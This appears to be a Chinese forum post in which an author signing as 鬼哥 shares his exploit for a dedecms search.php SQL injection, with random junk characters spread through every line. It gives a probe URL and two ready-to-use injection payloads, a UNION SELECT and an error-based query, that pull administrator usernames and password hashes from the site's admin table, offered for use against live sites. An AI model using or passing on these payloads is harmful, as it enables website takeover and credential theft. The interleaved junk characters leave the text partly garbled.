转载不加作者名的没JJ9 K/ ^- d2 y2 O* p. f M/ `3 b
! U1 U2 S. C' b( h6 O哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
% j9 q3 d4 `6 B( i% a4 C/ g
1 N8 {) f, j V/ S2 \3 o既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
& y( L" D7 I( p' q( g/ B. @4 H% d
) ^4 M- V8 P$ Z. x$ e我一般是这样测试的:
0 \2 t. `( }$ s3 l- ?) B- H( F
' R2 \8 l6 @: \3 d提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
- N6 S6 p2 X! C W5 k. p: s6 ~+ E+ _2 v. L- P
转载不加作者名的没JJ
* y+ q% x& h( L5 b, e2 w, A6 I. z: I3 t, U$ {2 k
作者:鬼哥6 S+ \6 w: E. V: t* I
: W1 R6 K6 {' W# z5 I) K
% z2 \2 [# l6 G1 L6 V( u8 e
/ o( y/ N7 U% _0 `5 z看结果如果提示
3 A3 }( K9 |# w/ Z: f! k& L
5 g1 D; y k1 jSafe Alert: Request Error step 2 !
+ `, V. K. o+ P+ O5 D8 Y7 w8 `
' a% S! S, }8 c那么直接用下面的exp
/ \; J: w* Z( W1 [
* \+ h; H+ C& y I1 w* H% lxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a% g& S* W( p5 |- h) \' T0 b
7 C1 K- U# Z' l# l: ^# P
& I; k" L% K$ ~) s看结果如果提示
+ m! o/ y* A5 K8 |/ A$ {9 X; Z J3 l# L4 v, F
Safe Alert: Request Error step 1 !2 A+ v) f p% @8 r p
6 x- n L. X# S8 w那么直接用下面的exp3 X6 L9 H. k+ b) g- f
\# \+ L, ?" {
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
A# L% ~% {3 A/ G) Y6 V0 k* @9 V% E
5 @0 B, Y2 c) O6 B, w如果正常显示证明漏洞不存在了。
$ e* o7 ^9 E+ P B7 }- T4 b' @8 ^
& [2 }% }2 g$ z# C- O9 W G转载不加作者名的没JJ |